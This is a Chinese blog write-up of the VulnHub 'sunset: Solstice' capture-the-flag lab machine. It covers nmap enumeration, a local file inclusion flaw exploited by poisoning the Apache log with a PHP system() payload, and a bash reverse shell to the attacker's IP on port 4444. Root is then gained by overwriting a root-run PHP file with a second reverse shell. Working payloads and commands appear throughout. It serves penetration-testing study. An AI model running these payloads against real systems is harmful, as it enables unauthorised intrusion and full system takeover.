sunset:Solstice靶场

最新推荐文章于 2025-05-12 21:21:04 发布
最新推荐文章于 2025-05-12 21:21:04 发布
阅读量1.1k 收藏 22
点赞数 18
文章标签: 网络 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhongyuekang820/article/details/147878826
版权

sunset:Solstice

https://www.vulnhub.com/entry/sunset-solstice,499/

1,将两台虚拟机网络连接都改为NAT模式

2,攻击机上做namp局域网扫描发现靶机

nmap -sn 192.168.23.0/24

那么攻击机IP为192.168.23.182,靶场IP192.168.23.244

3,对靶机进行端口服务探测

nmap -sV -T4 -p- -A 192.168.23.244

1. FTP服务分析(21/tcp, 2121/tcp, 62524/tcp)

pyftpdlib 1.5.6 (21/tcp, 2121/tcp):

  • 匿名登录允许(2121端口):尝试登录 ftp://192.168.23.244:2121 用户名为 anonymous,空密码。
  • 检查 pub 目录:ls -al 查看权限和文件。若可写,可上传反向Shell或测试文件。
  • 搜索漏洞:pyftpdlib 1.5.6 是否存在已知漏洞(如CVE-2021-30800)。

FreeFloat ftpd 1.00 (62524/tcp):

  • 旧版本,可能存在缓冲区溢出漏洞(如CVE-2010-4221)。使用 searchsploit freefloat 查找EXP。

2. SSH服务分析(22/tcp)

OpenSSH 7.9p1:

  • 检查版本是否有已知漏洞(如CVE-2021-41617),但该版本较新,可能已修复。
  • 若获取凭证,可尝试登录。或通过其他服务(如FTP/SMB)泄露的凭证进行爆破。

3. SMTP服务分析(25/tcp)

Exim smtpd:

  • 使用 smtp-user-enum 或手动命令枚举用户:
    telnet 192.168.23.244 25
    VRFY root          # 测试是否存在用户
  • 检查CVE-2019-15846(Exim 4.92.1以下远程代码执行),但需确认版本是否受影响。

4. HTTP服务分析(80/tcp, 8593/tcp, 54787/tcp)

Apache 2.4.38 (80/tcp):

PHP cli服务器 (8593/tcp, 54787/tcp):

5. SMB服务分析(139/tcp, 445/tcp)

Samba 4.9.5-Debian:

  • 枚举共享和用户:
    smbclient -L 192.168.23.244 -N
    enum4linux -a 192.168.23.244
  • 检查匿名访问共享:
    smbclient     \\\\192.168.23.244\\[sharename] -N
  • 测试CVE-2017-7494(Samba远程代码执行),但需配置允许写入共享。

6. Squid代理分析(3128/tcp)

Squid 4.6:

 

421端口的ftp服务器登录失败,登录2121端口的ftp服务器成功

ftp 192.168.23.244

ftp 192.168.23.244 2121

再看看web服务的几个端口

http://192.168.23.244/

http://192.168.23.244:8593/

http://192.168.23.244:54787/

5,经过测试这个网站存在本地文件包含漏洞

http://192.168.23.244:8593/index.php?book=../../../../../../etc/passwd

那么就需要把这个本地文件包含漏洞利用起来,然后getshell。正好能够包含

http://192.168.23.244:8593/index.php?book=../../../../../../../../../var/log/apache2/access.log

使用nc污染日志

echo -e "GET / HTTP/1.1\r\nHost: 192.168.23.244\r\nUser-Agent: <?php system(\$_GET['cmd']); ?>\r\nConnection: close\r\n\r\n" | nc 192.168.23.244 80

访问文件包含网页确定漏洞是否利用成功

http://192.168.23.244:8593/index.php?book=../../../../../../../../../var/log/apache2/access.log&cmd=id

漏洞利用成功,成功执行了系统命令,接下来构造命令反弹shell(需要URL编码)

bash -c 'exec bash -i &>/dev/tcp/192.168.23.182/4444 <&1'

http://192.168.23.244:8593/index.php?book=../../../../../../../../../var/log/apache2/access.log&cmd=bash%20-c%20%27exec%20bash%20-i%20%26%3E/dev/tcp/192.168.23.182/4444%20%3C%261%27%0A

使用kali接收来自靶机的shell

6,信息收集一下

uname -a

cat /etc/*-release

getconf LONG_BIT

搜索一下root用户可读可写的可执行文件

find / -type f -user root -perm -o=w 2>/dev/null | grep -v "/sys/" | grep -v "/proc/"

查看一下这个文件

cat /var/tmp/sv/index.php

查看一下进程

ps -ef | grep "/var/tmp/sv"

发现有一个进程使用php解释器执行/var/tmp/sv,使用ehco写入木马构造恶意php文件

echo "<?php" > /var/tmp/sv/index.php && echo "echo \"Under construction\";" >> /var/tmp/sv/index.php && echo "exec(\"/bin/bash -c 'bash -i >& /dev/tcp/192.168.23.182/8888 0>&1'\");" >> /var/tmp/sv/index.php && echo "?>" >> /var/tmp/sv/index.php

cat /var/tmp/sv/index.php

靶机上通过nc访问运行这个进程的57端口,并请求/index.php文件

cd /tmp

curl localhost:57

然后kali开启对8888端口的监听

nc -lvvp 8888

成功提权成为root用户,拿到flag

freesec
关注
vulnhub靶场sunset: sunrise
qq_34613171的博客
02-09 490
说明:玩得开心! 难度:初学者 联系人:@ whitecr0wz http://192.168.0.108/ 目录扫描,无结果。 端口扫描,开了3306 8080 有个目录浏览,就一个文件。 这里需要主要 generated by weborf/0.12.2 这东西网上一搜 目录遍历的洞 /…%2f…%2f…%2f…%2f…%2f…%2f…%2fetc%2fpasswd 读取/etc/...
vulnhub靶机sunset:decoy渗透笔记
liver100day的博客
08-03 1349
这里写目录标题1.环境搭建2.信息收集2.1 主机发现2.2 端口扫描2.3 访问80端口(http服务)3. 漏洞利用3.1 使用压缩包密码破解工具爆破压缩文件密码3.2 爆破用户密码3.3 ssh登录4.提权5.总结 1.环境搭建 靶机环境搭建 攻击渗透机: kali IP地址:192.168.33.139 靶机:sunset:decoy IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/sunset-decoy,505/ 2.信息收集 2.1 主机发现 要进行渗透
vulnhub sunset: solstice
箭雨镜屋
08-14 997
渗透思路:nmap扫描端口 ---- 利用LFI和apache访问日志getshell ---- 利用可写的本地http服务php文件提权
sunset: dawn靶场渗透
sucker的博客
05-07 1030
7,两个文件中挑一个文件进行利用,在本地新建该文件,写入反弹shell一句话,本地开启监听,smb连接,将该文件上传到靶机。命令会直接调用操作系统的 Shell,而由于当前进程权限为 root,因此新启动的 Shell 也会继承 root 权限。:利用Apache路径遍历(CVE-2021-41773)或Web应用漏洞(如文件上传)。暴露了一些日志文件的路径,前三个没有访问的权限,第四个泄露了一些信息。(或管理员权限)启动 MySQL 客户端,具体权限取决于。:Web服务用户执行,可能通过Web漏洞触发。
vulhub-sunset:solstice
2201_75378806的博客
05-13 346
所以在网上找到apache2的访问日志可能保存的文件路径,挨个进行文件包含看看访问日志到底保存在哪里,最后发现在/var/log/apache2/access.log。由于这个php文件是由root运行的,并且我们有写权限,因此我们可以将文件的内容更改为恶意php代码,这将为我们提供反向shell。由于nmap扫描出80端口是apache httpd 2.4.38,可以试试apache日志中毒。我们将使用这个 php 代码来获取反向 shell,将 ip 更改为攻击者的 ip 并记住端口。
带你玩转渗透测试靶场Vulnhub——sunset: nightfall
m0_74025111的博客
10-14 315
这样的话,我们利用这两个用户名(nightfall,matt)去爆破一下ftp服务(九头蛇密码爆破工具)命令如下:我这里是引用了kali自带的一个密码本去破解的,当然你们也可以去生成新的这些都是可以的。既然是这个matt的home目录中,那我们直接上传SSH的公钥到authorized_keys文件,然后用私钥去进入靶机,然后在提权, 以下:先生成一个ssh的密钥。这时我们回想起刚才的端口服务那的samba的服务,针对samba我们用以下的命令去解决它。已经成功利用ftp服务,进到了靶机内部。
vulhub-sunset:dawn3
2201_75378806的博客
05-13 718
这台靶机的知识是win缓冲区溢出漏洞,本篇文章是按照b站红队笔记师傅视频学习的nmap 常规扫描,有个6812端口和21端口匿名登入ftp,下载dawn3.exefile,binwalk,strings先查看一下文件从输出中可以看到一些信息:PE32 是一种用于 32 位 Windows 操作系统的可执行文件格式"(console)" 表示这是一个控制台应用程序。
sunset: noontide靶机渗透-vulnhub
m0_68117643的博客
07-18 1188
这台靶机(sunsetnoontide)运行在Vmware中无法获取靶机IP,换VirtualBox后NAT和桥接模式下也未获取到IP,仅在host-only模式下才找到靶机IP 突破点:反弹shell—root弱口令提权
vulnhub靶场sunset:dusk
qq_34613171的博客
02-10 484
说明:这是另一个,请享用。 难度:初学者 联系人:@ whitecr0wz 在VirtualBox中这可能比VMware更好 扫端口。 爆破FTP弱口令和mysql弱口令。 查看8080端口 这里所列的文件是当前目录下的。 当前的工作目录为/var/tmp 登录Mysql 这里的secure_file_priv为空,说明可以写任意目录。 这里菜刀连接不上. 用其他的webshell ...
SUNSET: MIDNIGHT靶机
logan_logan的博客
07-22 563
1.浏览器输入地址打开网页;
ConcreteStructs.jl::love_hotel::house::cityscape_at_dusk::hotel::sunset::bank:
02-17
ConcreteStructs.jl ConcreteStructs.jl导出宏@concrete ,该宏可用于使非混凝土结构混凝土,而无需添加类型参数的样板。 using ConcreteStructs @concrete struct AB a b end julia> ab = AB("hi", 1+im) ...
VulnHub靶场sunset:noontide
A_dmin的博客
09-30 1271
VulnHub靶场sunset:noontide nmap扫描主机存活: 扫描端口,开放三个端口: emmm,irc是什么服务啊,就很迷,,百度搜索一波,,,好像是一个类似于网络聊天啥的东西 不太会啊,也没玩过这个,,,,直接searchsploit搜索一下版本好像是unreal: 还真有!使用第三个,,,,先下载到本地 使用msfvenom生成payload: 复制如上payload,打开13853.pl更改payload,一开始有五行直接删除其余四行,更改第一行: 然后保存运行: 监听4
2025-05-07 Unity 网络基础8——UDP同步&异步通信
zheliku的博客
05-07 1632
创建套接字 Socket。用Bind()方法将套接字与本地地址进行绑定。用和SendTo()方法在套接字上收发消息。用Shutdown()方法释放连接。关闭套接字。
Linux网络编程day8本地套接字
weixin_71568456的博客
05-09 445
本地套接字通过C/S模型实现进程间通信,与网络编程中的TCP C/S模型有所不同。在本地套接字中,socket函数的domain参数需设置为AF_UNIX,地址结构使用sockaddr_un,并通过bind函数绑定到本地文件路径。服务器端在bind前需调用unlink确保文件路径可用,客户端则需显式绑定并初始化服务器地址结构。通信过程中,服务器通过accept接收连接,客户端通过connect建立连接。本地套接字适用于同一主机上的进程间通信,避免了网络通信的复杂性。
计算机网络|| 常用网络命令的作用及工作原理
2501_91659497的博客
05-11 929
文章摘要: 本文详细介绍了多种网络命令及其工作原理,包括hostname、ping、ipconfig/all、nslookup、nbtstat、netstat、arp、tracert、pathping、routeprint、netshare、netuser、netuse和netsession。这些命令在网络管理中扮演着重要角色,用于显示计算机的主机名、检测网络连通性、获取网络配置信息、查询DNS服务器、显示NetBIOS信息、监控网络连接和统计、追踪数据包路径、管理路由表、控制共享资源和用户账户等。此外,文
【Linux高级全栈开发】2.1高性能网络-网络编程——2.1.1 网络IO与IO多路复用——select/poll/epoll
qq_43714515的博客
05-11 468
本文介绍了Linux高性能网络编程中的关键概念和技术,重点探讨了I/O多路复用机制(select、poll、epoll)及其在高并发网络应用中的应用。首先,文章解释了网络I/O的基本概念及其在编程中的实现方式,指出了“一请求一线程”模型的局限性,并提出了基于事件驱动的改进方案。随后,详细介绍了select、poll和epoll三种I/O多路复用技术的原理、工作流程及其优缺点,特别是epoll在性能上的显著优势。最后,文章通过对比表格总结了三种技术的特性,帮助开发者根据实际需求选择合适的技术方案。本文内容为高
TCPIP详解 卷1协议 七 防火墙和网络地址转换
最新发布
石灰聪的博客
05-12 989
为防止终端系统不被攻击,需要一种方法来控制互联网中网络流量的流向。这项工作由防火墙来完成,它是一种能够限制所转发的流量类型的路由器。随着部署防火墙来保护企业,另一个问题变得越来越重要:可用的IPv4地址数量正面临枯竭的威胁。必须采取有效的措施来管理 IP 地址的分配和使用。除了IPv6 之外,一种最为重要的解决机制就是网络地址转换(Network Address Translation,NAT)。NAT将私有地址转换为公共地址,使得内部网络的设备无需全球唯一地址即可访问互联网。
小白入!WiFi 技术大解析
wpgddt的博客
05-08 585
WiFi,全称Wireless Fidelity,是一种无线局域网技术,允许电子设备通过无线电波连接到互联网。以下是对WiFi的一些介绍:
计算机网络:计算机之间的数据传输为什么要以时钟频率同步为基础?
shunzi2016的博客
05-12 257
以太网信息同步需要保障时钟同步的主要原因包括确保数据的准确采样与解析、支持高速传输的时序容限、协调多设备协同工作、物理层与协议层的依赖以及网络设备的高效协作。时钟同步对于比特级同步、符号对齐、抗抖动需求、避免数据冲突与乱序、实时应用需求、物理层时钟恢复、帧结构解析、交换与路由时序以及时间敏感网络(TSN)等方面至关重要。时钟不同步可能导致误码率上升、链路不稳定和系统级故障。随着网络向高速化、低延迟化发展,时钟同步的精度要求日益严苛,成为保障网络性能与功能的关键技术。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值